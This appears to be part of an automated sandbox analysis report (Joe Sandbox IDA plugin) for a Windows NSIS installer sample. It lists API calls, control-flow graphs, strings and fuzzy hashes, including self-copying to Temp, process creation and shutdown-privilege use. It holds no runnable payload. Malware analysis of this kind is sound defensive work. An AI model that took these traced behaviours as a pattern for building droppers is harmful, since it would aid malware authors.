                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                              • wsprintfW.USER32 ref: 004039B1
                                                              • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                              • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\file.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                              • ExitProcess.KERNEL32 ref: 00403A9F
                                                              • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                              • ExitProcess.KERNEL32 ref: 00403B49
                                                                • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform\Tjenestepligterne$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                              • API String ID: 1813718867-2364880001
                                                              • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                              • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                              • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                              • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                                              Control-flow Graph

                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                              • GetClientRect.USER32(?,?), ref: 004057C5
                                                              • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                              • ShowWindow.USER32(?,00000008), ref: 00405868
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                              • ShowWindow.USER32(00000000), ref: 00405914
                                                              • ShowWindow.USER32(?,00000008), ref: 00405919
                                                              • ShowWindow.USER32(00000008), ref: 00405963
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                              • CreatePopupMenu.USER32 ref: 004059A8
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                              • GetWindowRect.USER32(?,?), ref: 004059DC
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                              • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                              • EmptyClipboard.USER32 ref: 00405A43
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                              • CloseClipboard.USER32 ref: 00405A9E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {
                                                              • API String ID: 590372296-366298937
                                                              • Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                                              • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                              • Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                                              • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Control-flow Graph
APIs
• DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
• lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CD4
• lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CF7
• lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
• FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
• FindClose.KERNEL32(00000000), ref: 00405DBC
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
• API String ID: 2035342205-3630010723
• Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
• Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
• Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
• Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
APIs
• FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
• FindClose.KERNEL32(00000000), ref: 004068CB
Strings
• C:\Users\user\AppData\Local\Temp\nsbB152.tmp, xrefs: 004068B4
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
• API String ID: 2295610775-627501760
• Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
• Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
• Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
• Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
APIs
• FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
• Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
• Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
• Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
• ShowWindow.USER32(?), ref: 00404033
• GetWindowLongW.USER32(?,000000F0), ref: 00404045
• ShowWindow.USER32(?,00000004), ref: 0040405E
• DestroyWindow.USER32 ref: 00404072
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
• GetDlgItem.USER32(?,?), ref: 004040AA
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
• IsWindowEnabled.USER32(00000000), ref: 004040C5
• GetDlgItem.USER32(?,00000001), ref: 00404170
• GetDlgItem.USER32(?,00000002), ref: 0040417A
• SetClassLongW.USER32(?,000000F2,?), ref: 00404194
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
• GetDlgItem.USER32(?,00000003), ref: 0040428B
• ShowWindow.USER32(00000000,?), ref: 004042AC
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
• EnableWindow.USER32(?,?), ref: 004042D9
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
• EnableMenuItem.USER32(00000000), ref: 004042F6
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
• lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
• SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
• ShowWindow.USER32(?,0000000A), ref: 00404493
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 121052019-0
• Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
• Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
• Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
• Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 439 403c29-403c41 call 40694b 442 403c43-403c53 call 40649e 439->442 443 403c55-403c8c call 406425 439->443 451 403caf-403cd8 call 403eff call 405f2e 442->451 447 403ca4-403caa lstrcatW 443->447 448 403c8e-403c9f call 406425 443->448 447->451 448->447 457 403d6a-403d72 call 405f2e 451->457 458 403cde-403ce3 451->458 463 403d80-403da5 LoadImageW 457->463 464 403d74-403d7b call 406594 457->464 458->457 459 403ce9-403d11 call 406425 458->459 459->457 469 403d13-403d17 459->469 467 403e26-403e2e call 40140b 463->467 468 403da7-403dd7 RegisterClassW 463->468 464->463 482 403e30-403e33 467->482 483 403e38-403e43 call 403eff 467->483 472 403ef5 468->472 473 403ddd-403e21 SystemParametersInfoW CreateWindowExW 468->473 470 403d29-403d35 lstrlenW 469->470 471 403d19-403d26 call 405e53 469->471 477 403d37-403d45 lstrcmpiW 470->477 478 403d5d-403d65 call 405e26 call 406557 470->478 471->470 476 403ef7-403efe 472->476 473->467 477->478 481 403d47-403d51 GetFileAttributesW 477->481 478->457 485 403d53-403d55 481->485 486 403d57-403d58 call 405e72 481->486 482->476 492 403e49-403e63 ShowWindow call 4068db 483->492 493 403ecc-403ecd call 4056af 483->493 485->478 485->486 486->478 500 403e65-403e6a call 4068db 492->500 501 403e6f-403e81 GetClassInfoW 492->501 496 403ed2-403ed4 493->496 498 403ed6-403edc 496->498 499 403eee-403ef0 call 40140b 496->499 498->482 506 403ee2-403ee9 call 40140b 498->506 499->472 500->501 504 403e83-403e93 GetClassInfoW RegisterClassW 501->504 505 403e99-403ebc DialogBoxParamW call 40140b 501->505 504->505 509 403ec1-403eca call 403b79 505->509 506->482 509->476
                                                              APIs
                                                                • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                              • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403CAA
                                                              • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,75573420), ref: 00403D2A
                                                              • lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                              • GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                              • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                              • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-931941464
                                                              • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                              • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                              • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                              • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 513 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 516 4030d2-4030d7 513->516 517 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 513->517 518 4032b2-4032b6 516->518 525 403110 517->525 526 4031f5-403203 call 40301e 517->526 528 403115-40312c 525->528 533 403205-403208 526->533 534 403258-40325d 526->534 530 403130-403139 call 4034d4 528->530 531 40312e 528->531 538 40325f-403267 call 40301e 530->538 539 40313f-403146 530->539 531->530 536 40320a-403222 call 4034ea call 4034d4 533->536 537 40322c-403256 GlobalAlloc call 4034ea call 4032b9 533->537 534->518 536->534 560 403224-40322a 536->560 537->534 564 403269-40327a 537->564 538->534 542 4031c2-4031c6 539->542 543 403148-40315c call 406002 539->543 547 4031d0-4031d6 542->547 548 4031c8-4031cf call 40301e 542->548 543->547 562 40315e-403165 543->562 555 4031e5-4031ed 547->555 556 4031d8-4031e2 call 406a38 547->556 548->547 555->528 563 4031f3 555->563 556->555 560->534 560->537 562->547 566 403167-40316e 562->566 563->526 567 403282-403287 564->567 568 40327c 564->568 566->547 569 403170-403177 566->569 570 403288-40328e 567->570 568->567 569->547 572 403179-403180 569->572 570->570 571 403290-4032ab SetFilePointer call 406002 570->571 575 4032b0 571->575 572->547 574 403182-4031a2 572->574 574->534 576 4031a8-4031ac 574->576 575->518 577 4031b4-4031bc 576->577 578 4031ae-4031b2 576->578 577->547 579 4031be-4031c0 577->579 578->563 578->577 579->547
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403093
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400), ref: 004030AF
                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 004030FB
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-3874380391
                                                              • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                              • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                              • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                              • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                                              Control-flow Graph

